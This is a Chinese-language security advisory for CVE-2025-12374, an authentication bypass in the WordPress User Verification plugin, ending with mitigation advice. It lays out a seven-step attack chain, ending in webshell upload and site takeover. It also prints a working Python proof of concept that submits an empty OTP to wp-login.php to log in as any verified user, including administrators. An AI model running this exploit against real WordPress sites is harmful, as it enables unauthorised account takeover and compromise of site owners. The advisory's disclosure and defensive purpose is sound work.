CVE-2025-12374 WordPress User Verification插件身份验证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-12374

漏洞类型

身份验证绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress User Verification插件（Email Verification, Email OTP, Block Spam Email, Passwordless login, Hide Login, Magic Login）

漏洞概述

CVE-2025-12374是WordPress User Verification插件中的一个严重身份验证绕过漏洞。该插件是一款广受欢迎的WordPress安全插件，提供邮件验证、OTP登录、垃圾邮件拦截、无密码登录、隐藏登录页面和魔术登录等功能，在WordPress官方插件库中有超过20万次安装。漏洞源于插件的OTP登录功能在处理用户输入时存在逻辑缺陷，未能正确验证OTP令牌是否已正确生成就直接进行比对。更严重的是，攻击者可以通过提交空白的OTP值来绕过身份验证机制。这意味着任何未经身份验证的远程攻击者都可以利用此漏洞，以任意已验证邮箱的用户身份登录WordPress网站，包括具有管理员权限的账户。一旦攻击者获得管理员访问权限，他们就可以完全控制整个WordPress网站，执行任意代码、上传恶意插件或主题、窃取敏感数据或进一步横向移动。由于该插件的广泛使用和漏洞的高危性质，此漏洞被评定为严重级别，CVSS评分高达9.8分。

技术细节

该漏洞的核心问题存在于插件的user_verification_form_wrap_process_otpLogin函数中。正常情况下，OTP登录流程应该是：1) 系统生成一个唯一的OTP令牌并存储；2) 用户通过邮件收到OTP；3) 用户提交OTP进行验证；4) 系统从存储中检索之前生成的OTP并与用户输入进行比对。然而，插件在实现步骤4时存在缺陷，它没有首先验证OTP令牌是否确实存在于存储中就直接进行了比对操作。当攻击者提交空白的OTP值时，插件的验证逻辑错误地认为空值匹配成功，从而允许攻击者通过验证。更糟糕的是，攻击者可以利用此漏洞以任何拥有已验证邮箱的账户登录，包括管理员账户。攻击者只需要知道目标用户的邮箱地址即可，不需要知道真实的OTP值。这种漏洞属于逻辑缺陷类身份验证绕过，与传统的注入类漏洞不同，它不需要特殊的字符编码或特殊构造，只需提交空值即可利用。攻击者可以利用此漏洞完全接管WordPress网站，执行任意代码、安装后门、窃取数据库内容等。

攻击链分析

STEP 1

步骤1

攻击者访问目标WordPress网站的登录页面，识别出使用了User Verification插件

STEP 2

步骤2

攻击者获取目标用户的邮箱地址（可以通过网站注册信息、评论、作者页面等途径获取）

STEP 3

步骤3

攻击者构造恶意请求，访问OTP登录端点并提交空的OTP值（user_otp参数留空）

STEP 4

步骤4

插件的user_verification_form_wrap_process_otpLogin函数未正确验证OTP是否存在，直接进行空值比对

STEP 5

步骤5

由于空值比对通过，插件错误地认为用户已通过OTP验证，生成有效的会话cookie

STEP 6

步骤6

攻击者获得目标用户（通常是管理员）的会话，成功登录WordPress后台

STEP 7

步骤7

攻击者在后台安装恶意插件、上传webshell或修改管理员密码，完全接管网站

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import re # CVE-2025-12374 PoC - WordPress User Verification Plugin Authentication Bypass # Target: WordPress site with User Verification plugin <= 2.0.44 def exploit_auth_bypass(target_url, target_email): """ Exploit the authentication bypass vulnerability in User Verification plugin. The vulnerability allows attackers to bypass OTP verification by submitting an empty OTP value. Args: target_url: Base URL of the WordPress site target_email: Email address of a verified user (e.g., admin) Returns: Boolean indicating if exploitation was successful """ # Step 1: Identify the OTP login endpoint login_endpoint = f"{target_url.rstrip('/')}/wp-login.php" # Step 2: Prepare the malicious request with empty OTP # The vulnerability is in the OTP validation logic that doesn't check # if OTP was actually generated before comparing payload = { 'user_verification_otp_login': '1', 'user_email': target_email, 'user_otp': '', # Empty OTP bypasses authentication 'redirect_to': '/wp-admin/', } try: # Step 3: Send the authentication bypass request response = requests.post( login_endpoint, data=payload, allow_redirects=False, timeout=30 ) # Step 4: Check for successful authentication # Successful bypass typically results in redirect to admin area if response.status_code in [301, 302, 303] and 'wp-admin' in response.headers.get('Location', ''): print(f"[+] Authentication bypass successful!") print(f"[+] Logged in as: {target_email}") print(f"[+] Redirect location: {response.headers.get('Location')}") return True # Alternative check: Look for auth cookies or success indicators if 'wordpress_logged_in' in str(response.cookies): print(f"[+] Authentication bypass successful!") return True print(f"[-] Authentication bypass failed") print(f"[-] Status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False # Example usage if __name__ == "__main__": target = "http://target-wordpress-site.com" admin_email = "[email protected]" exploit_auth_bypass(target, admin_email)

影响范围

WordPress User Verification插件 <= 2.0.44（所有版本）

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1) 暂时禁用或删除User Verification插件，改用其他替代方案；2) 限制WordPress登录页面的访问IP，只允许信任的IP地址访问wp-login.php；3) 使用Web应用防火墙（WAF）规则阻止异常的OTP登录请求；4) 监控WordPress网站的登录日志，及时发现异常登录行为；5) 考虑将网站暂时下线或设置维护模式以防止攻击；6) 备份网站数据和数据库，以便在遭受攻击后进行恢复。